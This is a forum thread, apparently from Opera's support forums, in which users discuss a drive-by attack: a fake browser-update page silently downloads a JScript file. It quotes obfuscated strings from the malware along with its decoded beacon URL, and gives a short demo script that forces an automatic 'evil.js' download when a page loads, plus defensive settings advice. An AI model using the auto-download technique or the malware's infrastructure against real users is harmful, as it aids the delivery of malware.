Drive-by download attack
-
burnout426 Volunteer last edited by burnout426
For:
var fguvakakam = kongahavha('mfciogx.w1sxc1q/gmeorcg.jahicdaexmzhxtnleaweywxuzne.snciggooelq.r3z0iaj7ydqbm2yfv/q/r:usxpmtmtqhu'); var tid = kongahavha('d0r0e5p'); var wbz = kongahavha('m1cbgai0i4mag2vag');
The functions translate that into:
https://f2bd7a03.login.nuwealthmedia.com/1x1.gif 500 a2a40ab1
Also, if you see in the code, it requests something from a server and gets a response back. You'll also see at the beginning of the code that the file is set to delete itself after it runs.
-
operaequalstrash last edited by
@leocg Yessir. The page that rendered was a somewhat official looking Opera update page that said my browser is out of date, click here to update. The js file just downloaded even without me clicking on anything...
-
operaequalstrash last edited by
@burnout426 it seems like WSH is enabled by default on Windows, and I had never disabled it when this drive-by happened. Either way, I secure erased my SSD, and reinstalled Win10 since there were some work files that are security sensitive.
If Opera shows a save as dialog for executable files by default as @leocg mentioned, shouldn't it show a dialog for a Jscript file when a webpage is trying to download it onto my machine? I get that it isn't much of a concern unless I execute the downloaded file, but this is just another way for an attack to bypass the browser sandbox, and get one step closer to having it executed (whether by mistake by the user or whatever). I reported the incident to Opera.
-
leocg Moderator Volunteer last edited by
@operaequalstrash You need to do anything to trigger the update message? I opened the link on Opera Stable 75 and Developer 77 and couldn't see anything related to Opera upgrade.
-
burnout426 Volunteer last edited by
@leocg I didn't have to do anything special in Chrome. But, it only happened after a few times of loading the link and only happened once. I have yet to trigger it in Opera to see if the js file gets dumped by itself in the downloads folder without asking.
-
burnout426 Volunteer last edited by burnout426
I don't know if this works for a remote html file, but it does for a local one:
local.html
<script> window.addEventListener("DOMContentLoaded", function() { var b = new Blob(['WScript.Echo("Hello World");']); var u = URL.createObjectURL(b, {type: "application/javascript"}); var a = document.createElement("a"); a.href = u; a.download = "evil.js"; a.textContent = "Update"; document.body.appendChild(a); a.click(); }, false); </script>
That will automatically dump evil.js in your download folder. You can double-left-click the file and Windows will ask you if you want to run it (as long as you didn't uncheck the "always ask" box in that dialog before).
You do get a notification in Opera that the download happened. But in Chrome, in the notification, you get a warning and an option to discard the download.
I can't say that this is how the site does it in Opera as I haven't been able to trigger the update page on that site in Opera.
-
operaequalstrash last edited by
@burnout426 the hijacked page must be doing a crude browser fingerprinting before rendering the fake update page, since you are getting one for Chrome, but not Opera, whereas I got one on Opera. All I can tell you about the condition that triggered the page for me on Opera was that I installed Opera 1 week prior to that, and everything was on its default setting - no additional plug ins.
In fact, this situation is identical to this user's : https://forums.opera.com/topic/33351/opera-automatic-webpage-redirect-to-update-page-that-auto-downloaded-a-javascript-file
He got the hijacked page on Opera, and you got the hijacked page on Chrome. I suspect that the hijacked page rotates the target browser so as not to alert the site admin that it was hijacked. That way if one user on Chrome gets the drive-by and alerts the admin only for the site admin to check out the site on Opera, he would see a normal page with no driveby and would more likely suspect that it was the user's machine that was hijacked rather than the site. Either way, at least I know that Chrome will ask it's users if he wants to proceed with the download, if there is an attempt at a drive-by download. So in this regard, Chrome isn't as trashy as Opera.
-
burnout426 Volunteer last edited by
For my demo at least, if you goto the URL
opera://settings/downloads
and enable "Ask where to save each file before downloading", you'll get prompted to download the js file where you can cancel it. -
operaequalstrash last edited by
@burnout426 That should be the default setting, given how easily hijacked pages can pull a drive-by.
-
pauli133 last edited by
I just had this happen as well. I clicked on an article via Google News, and saw the page redirected to an Opera update notice. A .js file was downloaded.
I've since reinstalled Opera, but I am leaning towards rebuilding the PC at this point.
-
operaequalstrash last edited by
@pauli133 This means Opera still doesn't make "Ask where to save each file before downloading" as the default setting, nor has it done anything to patch against this drive by vulnerability. Remember my name...
-
OwenP2004 last edited by
I just had this same thing happen to me online, a pop up appeared saying I had an out of date opera and it automatically downloaded a .js file without my permission.
I immediately deleted the file and cleared my recycling bin and did not open the file. Will I be safe now or are there any other things that I should have to worry about. Can the .is file harm my computer in any way without me opening it? -
operaequalstrash last edited by
@owenp2004 If the js file was never run, then it is unlikely to cause any harm, though when that happened to me, I did a complete wipe of my SSD and reinstalled Windows since I don't really trust Windows security. If you were running an up to date Linux based OS and a prudent user of the OS, then you don't have much to worry about since the js file most likely has codes to download the actual payload (executable of the malware) meant for Windows. I'm not sure about how Windows 10 security deals with javascript files, but if you never ran the file, then it probably is safe, but probably a good idea to back up your files now just in case you need to do a complete wipe and reinstall. I dealt with a ransomsware before, and it is annoying AF. Oh and remember my name...
-
-